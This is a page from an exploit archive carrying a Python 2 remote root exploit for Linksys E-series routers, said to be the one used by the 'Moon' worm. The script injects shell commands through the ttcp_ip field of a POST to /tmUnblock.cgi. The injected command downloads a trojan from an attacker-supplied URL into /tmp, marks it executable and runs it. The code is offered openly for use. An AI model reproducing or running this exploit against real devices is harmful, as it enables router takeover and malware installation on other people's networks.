Linksys E-series Worm Remote Root

2014.02.18
Credit: infodox
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python2 """ Linksys Remote Root Exploit infodox - insecurety research This is the exploit this "Moon" worm uses. Trivial blind cmd injection :) This version crippled - uses wget. Twitter: @info_dox Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku """ import requests import sys def banner(): print """\x1b[0;32m .____ .__ __ | | |__| ____ | | __ _________.__. ______ | | | |/ \| |/ / / ___< | |/ ___/ | |___| | | \ < \___ \ \___ |\___ \ |_______ \__|___| /__|_ \/____ >/ ____/____ > \/ \/ \/ \/ \/ \/ You are the weakest link. Goodbye. Linksys remote root - infodox - Insecurety Research. Version 2: Crippled (wget shelldrop only) \x1b[0m""" def upShell(wget_url, target): """ This works with the normal busybox wget at least, and worked in testing""" cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" %(wget_url) print "{+} Planting Bomb!" execute_command(target=target, command=cmd) print "{!} TERRORISTS WIN!" def execute_command(target, command): url = target + "/tmUnblock.cgi" injection = "-h `%s`" %(command) # this is a very sexy POST request. TOTALLY LEGIT. the_ownage = {'submit_button': '', 'change_action': '', 'action': '', 'commit': '0', 'ttcp_num': '2', 'ttcp_size': '2', 'ttcp_ip': injection, 'StartEPI': '1'} headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'} # it is truly mad hax. mad_hax = requests.post(url=url, data=the_ownage, headers=headers) def main(args): banner() if len(sys.argv) != 3: sys.exit("usage: %s http://target http://me.com/trojan.bin" %(sys.argv[0])) upShell(wget_url=sys.argv[2], target=sys.argv[1]) if __name__ == "__main__": main(sys.argv)

References:

http://cxsecurity.com/issue/WLB-2014020133


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top